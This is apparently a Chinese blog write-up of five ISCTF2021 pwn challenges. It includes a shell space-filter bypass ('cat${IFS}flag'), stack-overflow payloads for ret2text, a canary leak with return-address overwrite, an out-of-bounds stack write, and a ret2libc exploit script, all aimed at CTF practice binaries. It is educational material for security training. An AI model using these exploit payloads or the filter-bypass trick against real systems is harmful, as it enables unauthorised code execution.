<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>haoo&#39;s pwn house - </title>
<meta name="description" content="pwn杰哥的nc题目描述听话！让我康康你的nc正不正常啊！ 解题思路与过程首先根据题目名称以及只给了远程连接没有附件，可以知道这是一道pwn中的nc题目，但是从题目描述中可以知道，这并不是正常的nc。接着尝试使用nc连接一下 [*] Switching to interactive mode$ lsbindevflag">
<meta name="theme-color" content="#090c0b">
<meta name="color-scheme" content="dark">
<link rel="stylesheet" href="/css/main.css">

  <link rel="alternate" type="application/rss+xml" title="haoo&#39;s pwn house RSS" href="/rss.xml">


<meta name="generator" content="Hexo 7.3.0"></head>
<body class="site-body">
  
  <header class="site-header">
  <a class="skip-link" href="#main-content">跳到正文</a>
  <div class="site-header__inner">
    <a class="site-brand" href="/" aria-label="haoo&#39;s pwn house 首页">
      <span class="site-brand__mark" aria-hidden="true">0x</span>
      <span class="site-brand__text">
        <strong>haoo&#39;s pwn house</strong>
        <small>binary security notes</small>
      </span>
    </a>

    <nav id="site-nav" class="site-nav" aria-label="主导航">
      
      
        <a class="site-nav__link" href="/">首页</a>
      
        <a class="site-nav__link" href="/archives">归档</a>
      
        <a class="site-nav__link" href="/categories">分类</a>
      
        <a class="site-nav__link" href="/tags">标签</a>
      
        <a class="site-nav__link" href="/about">关于</a>
      
        <a class="site-nav__link" href="/links">链接</a>
      
        <a class="site-nav__link" href="/rss.xml">RSS</a>
      
    </nav>

    <button class="command-toggle" type="button" data-command-open aria-label="打开命令行" aria-keyshortcuts="Control+K">
      <span aria-hidden="true">&gt;_</span>
      <span>Console</span>
      <kbd>Ctrl K</kbd>
    </button>

    <button class="menu-toggle" type="button" aria-label="打开导航" aria-expanded="false" aria-controls="site-nav">
      <span></span>
      <span></span>
      <span></span>
    </button>
  </div>
  <div class="reading-progress" aria-hidden="true"><span></span></div>
</header>


  <main id="main-content" class="site-main article-main">
    <article class="article-wrap">
      <header class="article-header">
        <div class="post-meta">
          <time datetime="2026-07-29">2026-07-29</time>
          <span>约 18 分钟</span>
          <span>8650 字</span>
        </div>
        <h1></h1>
        
      </header>

      <div class="article-grid">
        <div class="article-body article-prose" id="article-content">
          <h1 id="pwn"><a href="#pwn" class="headerlink" title="pwn"></a>pwn</h1><h2 id="杰哥的nc"><a href="#杰哥的nc" class="headerlink" title="杰哥的nc"></a>杰哥的nc</h2><h3 id="题目描述"><a href="#题目描述" class="headerlink" title="题目描述"></a>题目描述</h3><p>听话！让我康康你的nc正不正常啊！</p>
<h3 id="解题思路与过程"><a href="#解题思路与过程" class="headerlink" title="解题思路与过程"></a>解题思路与过程</h3><p>首先根据题目名称以及只给了远程连接没有附件，可以知道这是一道pwn中的nc题目，但是从题目描述中可以知道，这并不是正常的nc。<br>接着尝试使用nc连接一下</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">[*] Switching to interactive mode<br>$ ls<br>bin<br>dev<br>flag<br>lib<br>lib64<br>pwn<br>[*] Got EOF while reading in interactive<br>$ <br></code></pre></td></tr></table></figure>
<p>发现在当前目录下有flag文件，尝试cat一下</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">[*] Switching to interactive mode<br>$ cat flag<br>$ ls<br>ls<br>$ cat flag<br>cat flag<br>$  <br></code></pre></td></tr></table></figure>
<p>发现问题所在了，执行完cat flag命令后，输入什么就输出什么，明显不对。我们知道在Linux中，如果只执行cat命令不带任何参数的话，它会从标准输入中读取内容输出到标准输出，也就是相当于我们输入什么就输出什么，直到ctrl+d结束。那么这样一来就大致知道了，这道题目应该是限制了空格，我们需要绕过空格过滤。<br>这里提供两个方法：使用${IFS}和输入重定向。</p>
<ul>
<li>${IFS}本质上利用了shell的分词规则，IFS是shell中的一个特殊环境变量，全称为Internal Field Separator，也就是内部字段分隔符，默认通常包含空格、Tab、换行。还有一个关键点就是这个只有在输入经过shell解析时才会有效，如system、sh -c，如果是execve，不经过shell，这个方法就没用了。</li>
<li>输入重定向：就是把程序原本从键盘读取的数据，改成从文件等其他来源读取。</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">[*] Switching to interactive mode<br>$ cat$&#123;IFS&#125;flag<br>ISCTF&#123;a54eb464-b2c9-4550-a218-bc2e2a667f14&#125;<br>[*] Got EOF while reading in interactive<br>[*] Switching to interactive mode<br>$ cat&lt;flag<br>ISCTF&#123;a54eb464-b2c9-4550-a218-bc2e2a667f14&#125;<br>[*] Got EOF while reading in interactive<br></code></pre></td></tr></table></figure>
<h3 id="复盘与总结"><a href="#复盘与总结" class="headerlink" title="复盘与总结"></a>复盘与总结</h3><p>这道题目考察了如何进行绕过空格过滤，了解了可以使用${IFS}和输入重定向进行绕过。</p>
<h2 id="救救小肥鲨吧"><a href="#救救小肥鲨吧" class="headerlink" title="救救小肥鲨吧"></a>救救小肥鲨吧</h2><h3 id="题目描述-1"><a href="#题目描述-1" class="headerlink" title="题目描述"></a>题目描述</h3><p>题目描述： 小肥鲨因为一个系统的密码而陷入了困境，需要拿到系统的管理权限，你能帮帮它吗？</p>
<h3 id="解题思路与过程-1"><a href="#解题思路与过程-1" class="headerlink" title="解题思路与过程"></a>解题思路与过程</h3><p>首先看一下开启了哪些保护</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">[*] &#x27;/mnt/d/国内赛/ISCTF2021/pwn/help_my_shark&#x27;<br>    Arch:       i386-32-little<br>    RELRO:      Partial RELRO<br>    Stack:      No canary found<br>    NX:         NX enabled<br>    PIE:        No PIE (0x8048000)<br>    Stripped:   No<br></code></pre></td></tr></table></figure>
<p>这是一个32位的题目，没有canary和pie，是比较简单的。放入ida中进行分析</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">int __cdecl func(int a1)<br>&#123;<br>  char s[36]; // [esp+0h] [ebp-28h] BYREF<br><br>  printf(&quot;help me : &quot;);<br>  gets(s);<br>  if ( a1 == 0xBEECAFEE )<br>    return system(&quot;/bin/sh&quot;);<br>  else<br>    return puts(&quot;Oh,no&quot;);<br>&#125;<br></code></pre></td></tr></table></figure>
<p>存在后门函数与栈溢出，那么最先想到的就是利用gets函数造成栈溢出，修改返回地址为后门函数从而获取shell。</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">backdoor = 0x080484F5<br>payload = cyclic(0x28 + 4) + p32(backdoor)<br>sl(payload)<br>[*] Switching to interactive mode<br>help me : Oh,no<br>[*] Got EOF while reading in interactive<br>$  <br></code></pre></td></tr></table></figure>
<p>发现这个方法行不通，此时就得看一下汇编了</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">.text:080484B6                 push    ebp<br>.text:080484B7                 mov     ebp, esp<br>.text:080484B9                 push    ebx<br>.text:080484BA                 sub     esp, 24h<br>.text:080484BD                 call    __x86_get_pc_thunk_bx<br>.text:080484C2                 add     ebx, 1B3Eh<br>.text:080484C8                 sub     esp, 0Ch<br>.text:080484CB                 lea     eax, [ebx-1A20h] ; &quot;help me : &quot;<br>.text:080484D1                 push    eax             ; format<br>.text:080484D2                 call    _printf<br>.text:080484D7                 add     esp, 10h<br>.text:080484DA                 sub     esp, 0Ch<br>.text:080484DD                 lea     eax, [ebp+s]<br>.text:080484E0                 push    eax             ; s<br>.text:080484E1                 call    _gets<br>.text:080484E6                 add     esp, 10h<br>.text:080484E9                 cmp     [ebp+arg_0], 0BEECAFEEh<br>.text:080484F0                 jnz     short loc_8048506<br>.text:080484F2                 sub     esp, 0Ch<br>.text:080484F5                 lea     eax, [ebx-1A15h] ; &quot;/bin/sh&quot;<br>.text:080484FB                 push    eax             ; command<br>.text:080484FC                 call    _system<br>.text:08048501                 add     esp, 10h<br>.text:08048504                 jmp     short loc_8048518<br>.text:08048506<br>.text:08048506 loc_8048506:                            ; CODE XREF: func+3A↑j<br>.text:08048506                 sub     esp, 0Ch<br>.text:08048509                 lea     eax, (aOhNo - 804A000h)[ebx] ; &quot;Oh,no&quot;<br>.text:0804850F                 push    eax             ; s<br>.text:08048510                 call    _puts<br>.text:08048515                 add     esp, 10h<br>.text:08048518<br>.text:08048518 loc_8048518:                            ; CODE XREF: func+4E↑j<br>.text:08048518                 nop<br>.text:08048519                 mov     ebx, [ebp+var_4]<br>.text:0804851C                 leave<br>.text:0804851D                 retn<br>.text:0804851D <br></code></pre></td></tr></table></figure>
<p>通过分析发现了，0x080484F5这个是func函数中的一段代码，而这段代码又依赖前面准备好的ebx，我们在ret之前会将ebp-4处的内容赋值给ebx，原先构造的payload会修改这处的值，导致最后发生错误。这里出现了_x86_get_pc_thunk_bx这个函数，这个函数的作用很简单，就是把当前代码位置附近的地址取出来放到ebx中，现在的关键就是怎么计算出这个ebx原先的值：首先call的时候会将080484C2这个压入栈中，接着进入函数将栈顶的值赋值给ebx，也就是现在ebx的值为0x080484C2，接着add     ebx, 1B3Eh，此时ebx的值就会变成0x804A000，后面就拿这个作为基址做后续动作。<br>那么就修改一下payload</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">backdoor = 0x080484F5<br>payload = cyclic(0x24) + p32(0x804A000) + p32(0) + p32(backdoor)<br>sl(payload)<br>[*] Switching to interactive mode<br>$ ls<br>bin<br>dev<br>flag<br>lib<br>lib32<br>lib64<br>pwn<br></code></pre></td></tr></table></figure>
<p>当然，还有一种方法就是让a1的值等于0xBEECAFEE，可以看一下栈上是大致是什么样的</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">-0000000000000028     char s[36];<br>-0000000000000004     _DWORD var_4;<br>+0000000000000000     _DWORD __saved_registers;<br>+0000000000000004     _UNKNOWN *__return_address;<br>+0000000000000008     _DWORD arg_0;<br></code></pre></td></tr></table></figure>
<p>通过这个可以写出一个新的payload</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">payload_2 = cyclic(0x28 + 4 + 4) + p32(0xBEECAFEE)<br></code></pre></td></tr></table></figure>
<p>因为这道题是先判断，再ret，所以这个payload即使修改了ebx和返回地址的值也不影响。</p>
<h3 id="复盘与总结-1"><a href="#复盘与总结-1" class="headerlink" title="复盘与总结"></a>复盘与总结</h3><p>这确实是一道非常简单的题目，如果是不带脑子的用ret2text，会修改ebx的值，导致错误，所以还是得看看汇编语言。</p>
<h2 id="Diceney-level1"><a href="#Diceney-level1" class="headerlink" title="Diceney-level1"></a>Diceney-level1</h2><h3 id="题目描述-2"><a href="#题目描述-2" class="headerlink" title="题目描述"></a>题目描述</h3><p>题目描述： 让我们来玩一个小小的游戏吧！赢了就给你flag!</p>
<h3 id="解题思路与过程-2"><a href="#解题思路与过程-2" class="headerlink" title="解题思路与过程"></a>解题思路与过程</h3><p>首先看一下开启了哪些保护</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">[*] &#x27;/mnt/d/国内赛/ISCTF2021/pwn/Diceney-level1/Diceney-level1&#x27;<br>    Arch:       amd64-64-little<br>    RELRO:      Partial RELRO<br>    Stack:      Canary found<br>    NX:         NX enabled<br>    PIE:        No PIE (0x400000)<br>    SHSTK:      Enabled<br>    IBT:        Enabled<br>    Stripped:   No<br>    Debuginfo:  Yes<br></code></pre></td></tr></table></figure>
<p>接着放入ida中进行分析一手</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">int __cdecl menu()<br>&#123;<br>  int seed; // [rsp+4h] [rbp-2Ch] BYREF<br>  int input; // [rsp+8h] [rbp-28h] BYREF<br>  int win; // [rsp+Ch] [rbp-24h]<br>  int i; // [rsp+10h] [rbp-20h]<br>  int guess; // [rsp+14h] [rbp-1Ch]<br>  char *file; // [rsp+18h] [rbp-18h]<br>  FILE *f; // [rsp+20h] [rbp-10h]<br>  unsigned __int64 v8; // [rsp+28h] [rbp-8h]<br><br>  v8 = __readfsqword(0x28u);<br>  win = 0;<br>  file = &quot;/dev/urandom&quot;;<br>  input = 0;<br>  for ( i = 0; i &lt;= 29; ++i )<br>  &#123;<br>    printf(&quot;Round: %d\n&quot;, i + 1);<br>    if ( win == 15 )<br>      puts(&quot;Hurry up! you will Win!!!&quot;);<br>    printf(&quot;Your first guess: &quot;);<br>    __isoc99_scanf(&quot;%d&quot;, &amp;input);<br>    f = fopen(file, &quot;r&quot;);<br>    fread(&amp;seed, 4u, 1u, f);<br>    srand(seed);<br>    *(&amp;input + i % 4) = input;<br>    guess = rand() % 1553;<br>    printf(&quot;My turn to say: %d\n&quot;, guess);<br>    if ( guess == input )<br>    &#123;<br>      puts(&quot;You are really lucky&quot;);<br>      ++win;<br>    &#125;<br>    else<br>    &#123;<br>      puts(&quot;No! maybe you haven&#x27;t found the trick&quot;);<br>    &#125;<br>    if ( win == 20 )<br>    &#123;<br>      puts(&quot;Great!!! You win&quot;);<br>      system(&quot;/bin/sh&quot;);<br>      return 0;<br>    &#125;<br>    printf(&quot;(%d/20) games to win!\n&quot;, win);<br>    fclose(f);<br>  &#125;<br>  return 0;<br>&#125;<br></code></pre></td></tr></table></figure>
<p>是一个猜数字的游戏，猜中20次，就可以获得shell了，一共可以猜30次。ok，看起来没什么思路，但是有一个非常关键的地方</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">int input; // [rsp+8h] [rbp-28h] BYREF<br>int win; // [rsp+Ch] [rbp-24h]<br>int i; // [rsp+10h] [rbp-20h]<br>int guess; // [rsp+14h] [rbp-1Ch]<br>*(&amp;input + i % 4) = input;<br></code></pre></td></tr></table></figure>
<p>什么意思呢？那句代码的意思是将你猜的input的值赋值给input的地址＋0、1、2、3处，而+1对应的是win的地址，+2对应的是i的地址，+3对应的是guess的地址。那么这样一来，第一次随便猜一个数，第二次猜20，就可以将win的值改为20从而获得shell了。</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">sl(b&quot;0&quot;)<br>sl(b&quot;20&quot;)<br>Your first guess: My turn to say: 397<br>No! maybe you haven&#x27;t found the trick<br>Great!!! You win<br>$ ls<br>bin<br>dev<br>flag.txt<br>lib<br>lib32<br>lib64<br>libx32<br>pwn<br></code></pre></td></tr></table></figure>
<h3 id="复盘与总结-2"><a href="#复盘与总结-2" class="headerlink" title="复盘与总结"></a>复盘与总结</h3><p>这道题核心没有考查伪随机数，由于取地址符号和指针没有用好，形成栈上越界写，从而可以修改一些我们想要的东西。</p>
<h2 id="金丝雀"><a href="#金丝雀" class="headerlink" title="金丝雀"></a>金丝雀</h2><h3 id="题目描述-3"><a href="#题目描述-3" class="headerlink" title="题目描述"></a>题目描述</h3><p>题目描述： 你现在想要拿到系统的shell，但是有一只金丝雀挡在了你的面前….</p>
<h3 id="解题思路与过程-3"><a href="#解题思路与过程-3" class="headerlink" title="解题思路与过程"></a>解题思路与过程</h3><p>还是老规矩</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">[*] &#x27;/mnt/d/国内赛/ISCTF2021/pwn/金丝雀&#x27;<br>    Arch:       amd64-64-little<br>    RELRO:      No RELRO<br>    Stack:      Canary found<br>    NX:         NX unknown - GNU_STACK missing<br>    PIE:        No PIE (0x400000)<br>    Stack:      Executable<br>    RWX:        Has RWX segments<br>    SHSTK:      Enabled<br>    IBT:        Enabled<br>    Stripped:   No<br></code></pre></td></tr></table></figure>
<p>有canary保护，但是看起来又可以打shellcode。接着依旧放入ida中进行分析</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">int __fastcall main(int argc, const char **argv, const char **envp)<br>&#123;<br>  _BYTE buf_[32]; // [rsp+0h] [rbp-50h] BYREF<br>  char buf[40]; // [rsp+20h] [rbp-30h] BYREF<br>  unsigned __int64 v6; // [rsp+48h] [rbp-8h]<br><br>  v6 = __readfsqword(0x28u);<br>  setvbuf(stdout, 0, 2, 0);<br>  setvbuf(stdin, 0, 2, 0);<br>  puts(&quot;Welcome ISCTF!&quot;);<br>  puts(&quot;Tell me your name&quot;);<br>  read(0, buf, 0x100u);<br>  printf(&quot;Ok %s,Do you kown PWN?,It&#x27;s 0x464c4147 right!\n&quot;, buf);<br>  read(0, buf_, 0x100u);<br>  puts(&quot;Ok bey!&quot;);<br>  return 0;<br>&#125;<br>int catflag()<br>&#123;<br>  return system(&quot;/bin/sh&quot;);<br>&#125;<br></code></pre></td></tr></table></figure>
<p>存在栈溢出和后门函数，可以借用printf进行canary值的泄漏，最后使用栈溢出修改返回地址到catflag函数，获得shell。payload如下：</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">payload_1 = b&quot;a&quot; * 0x29<br>s(payload_1)<br>io.recvuntil(&quot;a&quot; * 0x29)<br>canary = u64(io.recv(7).rjust(8, b&quot;\x00&quot;))<br>leak(&quot;canary&quot;, canary)<br>catflag_addr = 0x4011D6<br>ret = 0x000000000040101a<br>payload_2 = cyclic(0x50 - 8) + p64(canary) + cyclic(8) + p64(ret) + p64(catflag_addr)<br>sl(payload_2)<br></code></pre></td></tr></table></figure>
<h3 id="复盘与总结-3"><a href="#复盘与总结-3" class="headerlink" title="复盘与总结"></a>复盘与总结</h3><p>这道题目考查了canary的泄漏与接收，以及一个简单的栈溢出覆盖返回地址，需要注意的是这道题要堆栈平衡，因此可以加一个ret。</p>
<h2 id="小肥鲨的疑惑"><a href="#小肥鲨的疑惑" class="headerlink" title="小肥鲨的疑惑"></a>小肥鲨的疑惑</h2><h3 id="题目描述-4"><a href="#题目描述-4" class="headerlink" title="题目描述"></a>题目描述</h3><p>题目描述： 笨蛋小肥鲨又来找你帮忙了。与上次不同的是，这次他找不到在哪里能拿到管理员权限了…Ubuntu 16.04</p>
<h3 id="解题思路与过程-4"><a href="#解题思路与过程-4" class="headerlink" title="解题思路与过程"></a>解题思路与过程</h3><figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">[*] &#x27;/mnt/d/国内赛/ISCTF2021/pwn/小肥鲨的疑惑&#x27;<br>    Arch:       amd64-64-little<br>    RELRO:      Partial RELRO<br>    Stack:      No canary found<br>    NX:         NX enabled<br>    PIE:        No PIE (0x400000)<br>    Stripped:   No<br></code></pre></td></tr></table></figure>
<p>看起来是人畜无害的保护，放入ida中进行分析</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">int __fastcall main(int argc, const char **argv, const char **envp)<br>&#123;<br>  init(argc, argv, envp);<br>  puts(&quot;Now start your play:\n&quot;);<br>  vuln();<br>  return 0;<br>&#125;<br>__int64 vuln()<br>&#123;<br>  _BYTE v1[32]; // [rsp+0h] [rbp-20h] BYREF<br>  return (int)gets(v1);<br>&#125;<br></code></pre></td></tr></table></figure>
<p>有明显的栈溢出，但是这一次什么都没有，因为是联网的，所以直接打ret2libc就行了，告诉了远程是Ubuntu 16.04，默认使用glibc2.23。这里需要注意的是，它这个puts是自带回车换行的，也就是说在puts出的那句话和我们输入之间有一空行，这个需要注意一下，否则接收的地址不对，exp如下：</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">offset = 0x28<br>pop_rdi = 0x400783<br>ret = 0x400506<br>puts_plt = elf.plt[&#x27;puts&#x27;]<br>puts_got = elf.got[&#x27;puts&#x27;]<br>replay = 0x4006ff<br>payload_1 = flat(<br>    b&#x27;A&#x27; * offset,<br>    ret,<br>    pop_rdi,<br>    puts_got,<br>    puts_plt,<br>    replay<br>)<br>io.sendlineafter(b&quot;Now start your play:\n\n&quot;, payload_1)<br>puts_addr = u64(io.recvuntil(b&#x27;\n&#x27;, drop=True).ljust(8, b&#x27;\x00&#x27;))<br>leak(&quot;puts_addr&quot;, puts_addr)<br>base_addr = puts_addr - 0x06f6a0<br>bin_sh = base_addr + 0x18ce57<br>system = base_addr + 0x0453a0<br>payload_2 = flat(<br>    b&#x27;A&#x27; * offset,<br>    ret,<br>    pop_rdi,<br>    bin_sh,<br>    system<br>)<br>io.sendlineafter(b&quot;Now start your play:\n\n&quot;, payload_2)<br></code></pre></td></tr></table></figure>
<h3 id="复盘与总结-4"><a href="#复盘与总结-4" class="headerlink" title="复盘与总结"></a>复盘与总结</h3><p>其实就是简单的ret2libc，但是由于没注意到puts自带换行符，所以在接收数据那一块卡了一会儿。因为给了版本，所以找的就很快。</p>

        </div>

        
          <aside class="toc-panel" aria-label="文章目录">
            <div class="toc-panel__head">
              <h2>目录</h2>
              <button class="toc-top" type="button">顶部</button>
            </div>
            <nav id="toc"></nav>
          </aside>
        
      </div>

      <nav class="article-nav" aria-label="文章导航">
        
        
      </nav>
    </article>
  </main>

  <footer class="site-footer">
  <div class="site-footer__inner">
    <p><strong>haoo&#39;s pwn house</strong><span aria-hidden="true"> / </span>1 篇记录<span aria-hidden="true"> / </span><a href="/rss.xml">RSS</a></p>
    <p>&copy; <span id="current-year"></span> haoo · powered by Hexo</p>
  </div>
</footer>
<dialog
  id="command-console"
  class="command-console"
  aria-labelledby="command-title"
  data-search-url="/search.json"
  data-home-url="/"
  data-archives-url="/archives"
  data-categories-url="/categories"
  data-tags-url="/tags"
  data-about-url="/about"
  data-links-url="/links"
  data-has-posts="true"
>
  <div class="command-console__bar">
    <div>
      <span class="command-console__status" aria-hidden="true"></span>
      <strong id="command-title">haoo@pwn-house:~</strong>
    </div>
    <button class="command-console__close" type="button" data-command-close aria-label="关闭命令行">ESC</button>
  </div>

  <div id="command-output" class="command-console__output" role="log" aria-live="polite" aria-relevant="additions">
    <div class="command-message command-message--accent">Startrace interactive shell v1.0</div>
    <div class="command-message">输入 <code>help</code> 查看命令，按 <kbd>Ctrl K</kbd> 随时打开。</div>
  </div>

  <form id="command-form" class="command-console__form" autocomplete="off">
    <label for="command-input"><span aria-hidden="true">visitor@pwn-house:~$</span><span class="visually-hidden">输入命令</span></label>
    <input id="command-input" name="command" type="text" inputmode="text" autocapitalize="off" spellcheck="false" aria-describedby="command-hint">
    <span class="command-console__cursor" aria-hidden="true"></span>
  </form>
  <p id="command-hint" class="command-console__hint">help · ls · cd · open · search · clear</p>
</dialog>

<script src="/js/theme.js" defer></script>

</body>
</html>
